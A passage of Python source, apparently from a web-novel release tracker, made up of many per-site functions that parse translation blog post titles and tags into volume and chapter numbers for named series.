vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if any('volume' in tag.lower() for tag in item['tags']) and (chp or vol):
return buildReleaseMessage(item, 'Tales of MU', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractPeasKingdom(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
ltags = [tmp.lower() for tmp in item['tags']]
if 'second chance' in ltags and (chp or vol):
return buildReleaseMessage(item, 'Second Chance: a Wonderful New Life', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSolitaryTranslation(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'The Great Ruler' in item['tags']:
return buildReleaseMessage(item, 'The Great Ruler', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractThyaeria(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Tales of Demons and Gods' in item['tags']:
return buildReleaseMessage(item, 'Tales of Demons and Gods', vol, chp, frag=frag, postfix=postfix)
if 'Warlock of the Magus World' in item['tags']:
return buildReleaseMessage(item, 'Warlock of the Magus World', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractPlaceOfLegends(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'The Fragile Monster Lord' in item['tags']:
return buildReleaseMessage(item, 'The Fragile Monster Lord', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'The New Start' in item['tags']:
return buildReleaseMessage(item, 'The New Start', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'The Rude Time Stopper' in item['tags']:
return buildReleaseMessage(item, 'The Rude Time Stopper', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractShinsori(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Doll Dungeon' in item['title']:
return buildReleaseMessage(item, 'Doll Dungeon', vol, chp, frag=frag, postfix=postfix)
if 'Levelmaker –' in item['title']:
return buildReleaseMessage(item, 'Levelmaker -Raising Levels While Living in Another World-', vol, chp, frag=frag, postfix=postfix)
if 'Isekai Tensei Harem' in item['title']:
return buildReleaseMessage(item, 'Isekai Tensei Harem', vol, chp, frag=frag, postfix=postfix)
if 'Undead Seeks Warmth' in item['title']:
return buildReleaseMessage(item, 'Undead Seeks Warmth', vol, chp, frag=frag, postfix=postfix)
if 'Raising Slaves in Another World While on a Journey' in item['title']:
return buildReleaseMessage(item, 'Raising Slaves in Another World While on a Journey', vol, chp, frag=frag, postfix=postfix)
if 'Occupation: Adventurer ; Race: Various' in item['title'] or 'Race: Various' in item['tags']:
return buildReleaseMessage(item, 'Occupation: Adventurer ; Race: Various', vol, chp, frag=frag, postfix=postfix)
if 'Yuusha ga onna da to dame desu ka?' in item['title']:
return buildReleaseMessage(item, 'Yuusha ga onna da to dame desu ka?', vol, chp, frag=frag, postfix=postfix)
if 'The Bears Bear a Bare Kuma' in item['title'] or 'Kuma Kuma Kuma Bear' in item['title']:
return buildReleaseMessage(item, 'Kuma Kuma Kuma Bear', vol, chp, frag=frag, postfix=postfix)
if 'Charmed?' in item['title']:
return buildReleaseMessage(item, 'Charmed?', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'Silver Death' in item['title']:
return buildReleaseMessage(item, 'Silver Death', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSoaring(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
# If you release "teaser" chapters, you're a douche
if "teaser" in item['title'].lower():
return False
if 'Limitless Sword God Chapter' in item['title'] or 'Limitless Sword God' in item['tags'] or 'LSG' in item['tags']:
return buildReleaseMessage(item, 'Limitless Sword God', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSoraTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if "teaser" in item['title'].lower():
return False
if 'Isekai Mahou....' in item['tags']:
return buildReleaseMessage(item, 'Isekai Mahou wa Okureteru!', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTotallyInsaneTranslation(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if "PMG" in item['tags']:
return buildReleaseMessage(item, "Peerless Martial God", vol, chp, frag=frag, postfix=postfix)
if 'DtH' in item['tags']:
return buildReleaseMessage(item, "Devouring The Heavens", vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTrungtNguyen(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Underdog Versus Boss' in item['tags']:
return buildReleaseMessage(item, 'Underdog Versus Boss', vol, chp, frag=frag, postfix=postfix)
if 'Xiao Qi Wait' in item['tags']:
return buildReleaseMessage(item, 'Xiao Qi Wait', vol, chp, frag=frag, postfix=postfix)
if 'Beloved Little Treasure' in item['tags']:
return buildReleaseMessage(item, 'Beloved Little Treasure', vol, chp, frag=frag, postfix=postfix)
if 'Real Fake Fiance' in item['tags']:
return buildReleaseMessage(item, 'Real Fake Fiance', vol, chp, frag=frag, postfix=postfix)
if 'Demoness Go See The Emperor' in item['tags']:
return buildReleaseMessage(item, 'Demoness Go See The Emperor', vol, chp, frag=frag, postfix=postfix)
if 'The Reluctant Bride Book I' in item['tags']:
if not vol:
vol = 1
return buildReleaseMessage(item, 'The Reluctant Bride Book I', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTaffyTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'CCM' in item['tags']:
return buildReleaseMessage(item, 'Close Combat Mage', vol, chp, frag=frag, postfix=postfix)
if 'CC' in item['tags']:
return buildReleaseMessage(item, 'Cheating Craft', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractOneManArmy(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if "DBWG – Chapter" in item['title'] or 'Dragon-Blooded War God' in item['tags']:
return buildReleaseMessage(item, 'Dragon-Blooded War God', vol, chp, frag=frag, postfix=postfix)
if 'Warlock of the Magus World' in item['tags']:
return buildReleaseMessage(item, 'Warlock of the Magus World', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractOKTranslation(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Oyaji Kanojo' in item['tags']:
return buildReleaseMessage(item, 'Oyaji Kanojo', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractUltimateArcane(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Isekai ni kanaderu densetsu ~toki wo tomeru mono~' in item['tags']:
return buildReleaseMessage(item, 'Isekai ni kanaderu densetsu ~toki wo tomeru mono~', vol, chp, frag=frag, postfix=postfix)
if 'JIKUU MAHOU DE ISEKAI TO CHIKYUU WO ITTARIKITARI' in item['tags']:
return buildReleaseMessage(item, 'Jikuu Mahou de Isekai to Chikyuu wo ittarikitari', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractRainbowTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Myriad of Shades' in item['tags']:
return buildReleaseMessage(item, 'Myriad of Shades', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractOmgitsaray(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if "chapter" in item['title'].lower():
return buildReleaseMessage(item, '9 Heavenly Thunder Manual', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractReddyCreations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if "rigel" in item['title'].lower():
return buildReleaseMessage(item, 'Rigel', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
else:
return buildReleaseMessage(item, 'Riddick/ Against the Heavens', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractShinSekaiYori(item):
'''
'''
chStr = ""
for tag in item['tags']:
if "chapter" in tag.lower():
chStr = chStr + " " + tag
chStr += " " + item['title']
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(chStr)
if not (chp or vol) or "preview" in item['title'].lower():
return False
if frag:
frag = frag / 10
return buildReleaseMessage(item, 'Shin Sekai yori', vol, chp, frag=frag, postfix=postfix)
####################################################################################################################################################
#
####################################################################################################################################################
def extractPrinceRevolution(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Romance RPG' in item['tags'] :
return buildReleaseMessage(item, 'Romance RPG', vol, chp, frag=frag, postfix=postfix)
if 'The Legend of Sun Knight' in item['tags'] :
return buildReleaseMessage(item, 'The Legend of Sun Knight', vol, chp, frag=frag, postfix=postfix)
if 'Dominions End' in item['tags'] :
return buildReleaseMessage(item, 'Dominions End', vol, chp, frag=frag, postfix=postfix)
if '½ Prince' in item['tags'] :
return buildReleaseMessage(item, '½ Prince', vol, chp, frag=frag, postfix=postfix)
if 'killvsprince' in item['tags'] :
return buildReleaseMessage(item, 'Kill No More VS 1/2 Prince', vol, chp, frag=frag, postfix=postfix)
if 'Illusions-Lies-Truth' in item['tags'] :
return buildReleaseMessage(item, 'Illusions, Lies, Truth', vol, chp, frag=frag, postfix=postfix)
if 'No Hero' in item['tags'] :
return buildReleaseMessage(item, 'No Hero', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractUntunedTranslation(item):
'''
'''
title = item['title'].replace(" III(", " vol 3 (") \
.replace(" III:", " vol 3:") \
.replace(" II:", " vol 2:") \
.replace(" I:", " vol 1:") \
.replace(" IV:", " vol 4:") \
.replace(" V:", " vol 5:")
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'meg and seron' in item['tags'] and chp and vol:
return buildReleaseMessage(item, 'Meg and Seron', vol, chp, frag=frag, postfix=postfix)
if 'lillia and treize' in item['tags'] and chp and vol:
return buildReleaseMessage(item, 'Lillia to Treize', vol, chp, frag=frag, postfix=postfix)
# TODO: Needs the facility to parse roman numerals!
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractRumorsBlock(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if "Rumor's Block" in item['tags'] and "chapter" in item['title'].lower():
return buildReleaseMessage(item, "Rumor's Block", vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTwistedCogs(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if '–' in item['title']:
postfix = item['title'].split('–', 1)[-1].strip()
if "smut" in item['title'].lower():
return buildReleaseMessage(item, 'Twisted Smut', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return buildReleaseMessage(item, 'Twisted Cogs', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
####################################################################################################################################################
#
####################################################################################################################################################
def extractReantoAnna(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Only I am not attacked in a world over runned by zombies' in item['tags'] or \
("Chapter" in item['title'] and len(item['tags']) == 1 and 'Uncategorized' in item['tags']):
return buildReleaseMessage(item, 'Only I am not attacked in a world overflowing with zombies', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSubudai11(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Mai Kitsune Waifu Chapter' in item['title'] :
return buildReleaseMessage(item, 'My Fox Immortal Wife', vol, chp, frag=frag, postfix=postfix)
if 'My Beautiful Teacher Chapter' in item['title'] :
return buildReleaseMessage(item, 'My Beautiful Teacher', vol, chp, frag=frag, postfix=postfix)
if 'Awakening – 仿如昨日' in item['title'] :
return buildReleaseMessage(item, 'Awakening – 仿如昨日', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractOneSecondSpring(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'The Princess Who Cannot Marry' in item['tags'] :
return buildReleaseMessage(item, 'The Princess Who Cannot Marry', vol, chp, frag=frag, postfix=postfix)
if 'Heavy Sweetness Ash-like Frost' in item['tags'] :
return buildReleaseMessage(item, 'Heavy Sweetness Ash-like Frost', vol, chp, frag=frag, postfix=postfix)
if 'Our Second Master' in item['tags'] :
return buildReleaseMessage(item, 'Our Second Master', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTranslationRaven(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Godly Hunter' in item['tags'] :
return buildReleaseMessage(item, 'Godly Hunter', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractRoxism(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Bocchi Tenseiki' in item['tags'] and "chapter" in item['title'].lower():
return buildReleaseMessage(item, 'Bocchi Tenseiki', vol, chp, frag=frag, postfix=postfix)
if 'Seirei Gensouki ~Konna Sekai de Deaeta Kimi ni~' in item['tags'] and "chapter" in item['title'].lower():
return buildReleaseMessage(item, 'Seirei Gensouki ~Konna Sekai de Deaeta Kimi ni~', vol, chp, frag=frag, postfix=postfix)
if 'DHM' in item['tags'] and "chapter" in item['title'].lower():
return buildReleaseMessage(item, 'Dungeon+Harem+Master', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSilvasLibrary(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if "Silva's Diary - Zero no Tsukaima" in item['tags'] :
return buildReleaseMessage(item, "Silva's Diary - Zero no Tsukaima", vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'God of Destruction' in item['tags'] :
return buildReleaseMessage(item, 'God of Destruction', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'God of Chaos' in item['tags'] :
return buildReleaseMessage(item, 'God of Chaos', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'My Path of Justice' in item['tags'] or 'MPJ1' in item['tags']:
return buildReleaseMessage(item, 'My Path of Justice', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'Truth and Myths' in item['tags'] :
return buildReleaseMessage(item, 'Truth and Myths', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'Soft Spoken Brutality' in item['tags'] :
return buildReleaseMessage(item, 'Soft Spoken Brutality', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'World of Immortals' in item['tags'] :
return buildReleaseMessage(item, 'World of Immortals', vol, chp, frag=frag, postfix=postfix)
if 'Bu ni mi' in item['tags'] :
return buildReleaseMessage(item, 'Bu ni mi', vol, chp, frag=frag, postfix=postfix)
if 'Rinkan no Madoushi' in item['tags'] :
return buildReleaseMessage(item, 'Rinkan no Madoushi', vol, chp, frag=frag, postfix=postfix)
if 'Arifureta' in item['tags'] :
return buildReleaseMessage(item, 'Arifureta Shokugyou de Sekai Saikyou', vol, chp, frag=frag, postfix=postfix)
if 'High Comprehension Low Strength' in item['tags'] :
return buildReleaseMessage(item, 'High Comprehension Low Strength', vol, chp, frag=frag, postfix=postfix)
if 'Martial Void King' in item['tags'] :
return buildReleaseMessage(item, 'Martial Void King', vol, chp, frag=frag, postfix=postfix)
if 'Very Pure and Ambiguous' in item['tags'] :
return buildReleaseMessage(item, 'Very Pure and Ambiguous: The Prequel', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractOriginNovels(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if '–' in item['title']:
postfix = item['title'].split("–")[-1]
if 'True Identity' in item['tags'] :
return buildReleaseMessage(item, 'True Identity', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractOutspanFoster(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if "Chapter" in item['tags'] and 'ascension' in item['tags'] :
return buildReleaseMessage(item, 'The Ascension Chronicle', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTsukigomori(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag):
return False
if 'Our Glamorous Time' in item['tags']:
return buildReleaseMessage(item, 'Our Glamorous Time', vol, chp, frag=frag, postfix=postfix)
if 'Same Place Not Same Bed' in item['tags']:
return buildReleaseMessage(item, 'Same Place Not Same Bed', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSutekiDaNe(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Can I Not Marry?' in item['tags']:
return buildReleaseMessage(item, 'Can I Not Marry? / Days of Cohabitation with the President', vol, chp, frag=frag, postfix=postfix)
if "Black Bellied Prince's Stunning Abandoned Consort" in item['tags']:
return buildReleaseMessage(item, "Black Bellied Prince's Stunning Abandoned Consort", vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSilentTl(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Legend' in item['tags']:
return buildReleaseMessage(item, "Legend", vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTranslatingZeTianJi(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
return buildReleaseMessage(item, "Ze Tian Ji ", vol, chp, frag=frag, postfix=postfix)
####################################################################################################################################################
#
####################################################################################################################################################
def extractSoojikisProject(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Weakest Skeleton' in item['tags'] or 'Home page' in item['tags']:
return buildReleaseMessage(item, 'Kurasu marugoto jingai tensei -Saijyaku no sukeruton ni natta ore-', vol, chp, frag=frag, postfix=postfix)
if 'Reincarnated as a Villager' in item['tags']:
return buildReleaseMessage(item, 'Reincarnated as a Villager ~ Strongest Slow-life', vol, chp, frag=frag, postfix=postfix)
if 'Yandere?' in item['tags'] and 'Weapons' in item['tags']:
return buildReleaseMessage(item, 'Myself, weapons, and Yandere', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractProjectAccelerator(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Black Healer' in item['tags']:
return buildReleaseMessage(item, 'Black Healer', vol, chp, frag=frag, postfix=postfix)
return False
def extractPrideXReVamp(item):
'''
# 'Pride X ReVamp'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractRaisingAngelsDefection(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractProcrasTranslation(item):
'''
#'ProcrasTranslation'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Slowlife' in item['tags']:
return buildReleaseMessage(item, 'Tensei Shite Inaka de Slowlife wo Okuritai', vol, chp, frag=frag, postfix=postfix)
return False
def extractPeaTranslation(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractPekaboBlog(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTerminusTranslation(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTaint(item):
'''
'''
titletmp = item['title'] + " ".join(item['tags'])
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(titletmp)
if not (chp or vol or frag) and not "preview" in item['title']:
return False
if 'Chapter Release' in item['tags'] and 'Taint' in item['tags'] and 'Main Story' in item['tags']:
return buildReleaseMessage(item, 'Taint', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'Chapter Release' in item['tags'] and 'Taint' in item['tags'] and 'Side Story' in item['tags']:
postfix = "Side Story"
return buildReleaseMessage(item, 'Taint', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractUselessno4(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if item['title'].startswith('Skeleton Knight '):
return buildReleaseMessage(item, 'Skeleton Knight, in another world', vol, chp, frag=frag, postfix=postfix)
if item['title'].startswith('1000 hugs '):
return buildReleaseMessage(item, '1000 nin no Homunkurusu no Shoujo tachi ni Kakomarete Isekai Kenkoku', vol, chp, frag=frag, postfix=postfix)
if item['title'].startswith('Paladin '):
extract = re.search(r'(\d+)\-(\d+)', item['title'], re.IGNORECASE)
if extract and not frag:
chp = int(extract.group(1))
frag = int(extract.group(2))
return buildReleaseMessage(item, 'Paladin of the End', vol, chp, frag=frag, postfix=postfix)
return False
def extractPettankoTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if item['title'].startswith('Isekai C-mart Hanjouki'):
return buildReleaseMessage(item, 'Isekai C-mart Hanjouki', vol, chp, frag=frag, postfix=postfix)
return False
def extractQualityMistranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractShell2lyCNovelSite(item):
'''
# 'Shell2ly C-Novel Site'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
fragfound = re.search(r'\((\d+)\)', item['title'])
if not frag and fragfound:
frag = int(fragfound.group(1))
if 'MMSTEM' in item['tags']:
return buildReleaseMessage(item, 'Madam, Master Said to Eat Meal', vol, chp, frag=frag, postfix=postfix)
return False
def extractOregaHeroineinEnglish(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSnowyPublications(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'New Release: ' in item['title']:
return buildReleaseMessage(item, 'Whisper of the Nightingale', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
def extractPandorasBook(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSlothTranslationsBlog(item):
'''
# 'Sloth Translations Blog'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if item['title'].startswith("Re:Master Magic "):
return buildReleaseMessage(item, 'The Mage Will Master Magic Efficiently In His Second Life', vol, chp, frag=frag, postfix=postfix)
if item['title'].lower().startswith("blacksmith chapter "):
return buildReleaseMessage(item, 'Botsuraku youtei nanode, Kajishokunin wo mezasu', vol, chp, frag=frag, postfix=postfix)
return False
def extractPatriarchReliance(item):
'''
# 'Patriarch Reliance'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
# Shitty assumption, if there is no prefix, it's probably a God and Devil World release.
if re.match(r"Chapters? \d+", item['title']):
return buildReleaseMessage(item, 'God and Devil World', vol, chp, frag=frag, postfix=postfix)
return False
def extractTentativelyUnderconstruction(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTwig(item):
'''
# 'Twig'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSunShowerFields(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTinkerbellsan(item):
'''
# 'Tinkerbell-san'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Caught in my Own Trap' in item['tags']:
return buildReleaseMessage(item, 'Caught in my Own Trap', vol, chp, frag=frag, postfix=postfix)
if 'Finding Glowing Beauty in Books' in item['tags']:
return buildReleaseMessage(item, 'Finding Glowing Beauty in Books', vol, chp, frag=frag, postfix=postfix)
if 'Boss’s Blind Date Notes' in item['tags']:
return buildReleaseMessage(item, 'Boss’s Blind Date Notes', vol, chp, frag=frag, postfix=postfix)
return False
def extractPenguinOverlordTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractPactWebSerial(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTatakauShishoLightNovelTranslation(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractShokyuuTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractPriddlesTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Magic is Japanese' in item['tags']:
return buildReleaseMessage(item, 'Magic is Japanese', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTyrantsEyeTranslations(item):
'''
#'Tyrant\'s Eye Translations'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTheLastSkull(item):
'''
# 'The Last Skull'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTranslationsFromOuterSpace(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractRuisTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'A Mismatched Marriage: Records of Washed Away Injustices' in item['tags']:
